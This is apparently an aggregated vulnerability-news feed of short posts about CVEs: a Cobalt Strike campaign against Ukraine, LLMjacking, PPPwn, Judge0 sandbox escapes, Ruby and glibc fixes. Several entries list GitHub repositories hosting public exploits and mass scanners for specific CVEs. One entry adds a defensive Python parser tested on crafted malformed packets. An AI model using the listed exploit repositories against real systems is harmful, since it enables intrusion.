A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##updated 2023-02-01T05:05:19
2 posts
28 repos
https://github.com/joshuavanderpoll/CVE-2021-3129
https://github.com/hupe1980/CVE-2021-3129
https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129
https://github.com/Axianke/CVE-2021-3129
https://github.com/SNCKER/CVE-2021-3129
https://github.com/ambionics/laravel-exploits
https://github.com/nth347/CVE-2021-3129_exploit
https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner
https://github.com/ajisai-babu/CVE-2021-3129-exp
https://github.com/zhzyker/CVE-2021-3129
https://github.com/zhzyker/vulmap
https://github.com/withmasday/CVE-2021-3129
https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A
https://github.com/idea-oss/laravel-CVE-2021-3129-EXP
https://github.com/miko550/CVE-2021-3129
https://github.com/JacobEbben/CVE-2021-3129
https://github.com/0nion1/CVE-2021-3129
https://github.com/simonlee-hello/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
https://github.com/qaisarafridi/cve-2021-3129
https://github.com/MadExploits/Laravel-debug-Checker
https://github.com/cuongtop4598/CVE-2021-3129-Script
https://github.com/qaisarafridi/cve-2021-31290
https://github.com/knqyf263/CVE-2021-3129
https://github.com/shadowabi/Laravel-CVE-2021-3129
https://github.com/keyuan15/CVE-2021-3129
Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.
##updated 2023-02-01T05:01:22
4 posts
PPPwn - PlayStation 4 PPPoE RCE
"PPPwn is a kernel remote code execution #exploit for #PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation."
##Well, the PlayStation pwnage that has been discussed since the start of the year relies on a security flaw dating from 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
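The quoted report says the bug is triggered "by having invalid options" in PPPoE/PPP negotiation, producing a heap overwrite and overread. The following is an added example, not PPPwn, FreeBSD or Sony code: a bounds-checked parser for the LCP option TLV format (Type, Length, Data, with Length counting the whole option, per RFC 1661) that shows the three checks a parser needs so a peer-chosen Length cannot read past the packet, stall the loop, or copy more data than a fixed-size option field holds. The fixed and minimum sizes are the RFC 1661/1334 values for MRU, Magic-Number, PFC, ACFC and the two protocol options; the sample packets are constructed here, and nothing in this block is claimed to match the console's actual code path.

```python
"""Bounds-checked parser for PPP LCP configuration options (RFC 1661 TLVs).

Added example, not PPPwn or any console code. Each option is
Type (1 byte), Length (1 byte, counting the whole option, so >= 2),
then Length-2 bytes of data. A parser that trusts Length as sent is the
bug class the post describes; this one refuses any option whose Length
it cannot vouch for.
"""
from __future__ import annotations
from dataclasses import dataclass

# Fixed-size option types from RFC 1661: MRU, Magic-Number, PFC, ACFC.
FIXED_LENGTH = {1: 4, 5: 6, 7: 2, 8: 2}
# Variable-size types with a minimum: Auth-Protocol, Quality-Protocol.
MIN_LENGTH = {3: 4, 4: 4}


class MalformedOption(ValueError):
    """Raised for any option whose Length field cannot be trusted."""


@dataclass(frozen=True)
class LcpOption:
    type: int
    data: bytes


def build_option(otype: int, data: bytes) -> bytes:
    """Encode one option; Length covers the type, length and data bytes."""
    return bytes([otype, 2 + len(data)]) + data


def parse_lcp_options(payload: bytes) -> list[LcpOption]:
    options: list[LcpOption] = []
    offset, end = 0, len(payload)
    while offset < end:
        if end - offset < 2:
            raise MalformedOption(f"truncated option header at offset {offset}")
        otype, olen = payload[offset], payload[offset + 1]
        # Check 1: Length < 2 means a negative data size and a loop that never advances.
        if olen < 2:
            raise MalformedOption(f"option type {otype} has length {olen} < 2")
        # Check 2: Length running past the packet end is an over-read.
        if offset + olen > end:
            raise MalformedOption(
                f"option type {otype} length {olen} exceeds packet ({end - offset} bytes left)")
        # Check 3: a fixed-size type must carry exactly its size; copying
        # olen-2 peer-chosen bytes into a fixed field is the overwrite.
        expected = FIXED_LENGTH.get(otype)
        if expected is not None and olen != expected:
            raise MalformedOption(f"option type {otype} must have length {expected}, got {olen}")
        minimum = MIN_LENGTH.get(otype)
        if minimum is not None and olen < minimum:
            raise MalformedOption(f"option type {otype} must have length >= {minimum}, got {olen}")
        options.append(LcpOption(otype, bytes(payload[offset + 2:offset + olen])))
        offset += olen
    return options


def rejects(payload: bytes) -> bool:
    """True if the parser refuses the payload."""
    try:
        parse_lcp_options(payload)
    except MalformedOption:
        return True
    return False


# Constructed samples: one well-formed option list and three hostile ones.
GOOD = build_option(1, b"\x05\xdc") + build_option(5, b"\xde\xad\xbe\xef")  # MRU 1500, magic number
OVERSIZED_MAGIC = bytes([5, 0x20]) + b"A" * 30   # Magic-Number claiming 32 bytes: overwrite
OVERREAD = bytes([1, 4, 0x05])                   # MRU whose Length runs past the packet
ZERO_LENGTH = bytes([7, 0])                      # PFC with Length 0: loop would never advance

if __name__ == "__main__":
    print(parse_lcp_options(GOOD))
    for name, pkt in (("oversized magic", OVERSIZED_MAGIC), ("overread", OVERREAD),
                      ("zero length", ZERO_LENGTH)):
        print(f"{name}: rejected={rejects(pkt)}")
```

The point of check 3 is easy to miss when reading a C implementation: validating that Length fits inside the packet (check 2) is not enough, because the receiver's own copy of a fixed-size option is sized by the type, not by the wire Length.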
##updated 2023-01-29T05:01:16
2 posts
@cR0w @reverseics There's a timeless argument over whether or not hardcoded default credentials are a vulnerability worthy of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-01-27T05:06:26
2 posts
4 repos
https://github.com/z92g/CVE-2022-26138
https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-
@cR0w @reverseics There's a timeless argument over whether or not hardcoded default credentials are a vulnerability worthy of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2022-02-01T17:45:43.750000
4 posts
10 repos
https://github.com/murataydemir/CVE-2021-21975
https://github.com/rabidwh0re/REALITY_SMASHER
https://github.com/CyberCommands/CVE2021-21975
https://github.com/zhzyker/vulmap
https://github.com/dorkerdevil/CVE-2021-21975
https://github.com/Vulnmachines/VMWare-CVE-2021-21975
https://github.com/Al1ex/CVE-2021-21975
https://github.com/TheTh1nk3r/exp_hub
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3- to 10-year-old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2021-06-03T11:15:08.307000
4 posts
12 repos
https://github.com/W01fh4cker/Serein
https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak
https://github.com/hackingyseguridad/directoriotraversal
https://github.com/milo2012/CVE-2018-13379
https://github.com/yukar1z0e/CVE-2018-13379
https://github.com/Blazz3/cve2018-13379-nmap-script
https://github.com/B1anda0/CVE-2018-13379
https://github.com/pwn3z/CVE-2018-13379-FortinetVPN
https://github.com/nivdolgin/CVE-2018-13379
https://github.com/jpiechowka/at-doom-fortigate
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3- to 10-year-old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allow an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #Judge0 #proofofconcept #vulnerability
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated, but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make fewer mistakes.
##2 posts
2 repos
https://github.com/jhonnybonny/CVE-2023-3824
https://github.com/StayBeautiful-collab/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-20353 and CVE-2024-20359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_27282 #cve202427282
> On April 23, the development team of the scripting language "Ruby" disclosed that "Ruby"'s regular expression (Regex) search has a vulnerability (CVE-2024-27282) that allows arbitrary memory addresses to be read. A fixed version has been released.
Information leak vulnerability in the regular expression compiler of the "Ruby 3" series; fixed versions released
Update to v3.0.7, v3.1.5, v3.2.4 or v3.3.1
https://forest.watch.impress.co.jp/docs/news/1586881.html
Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.
https://github.com/NixOS/hydra/security/advisories/GHSA-2p75-6g9f-pqgx
Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##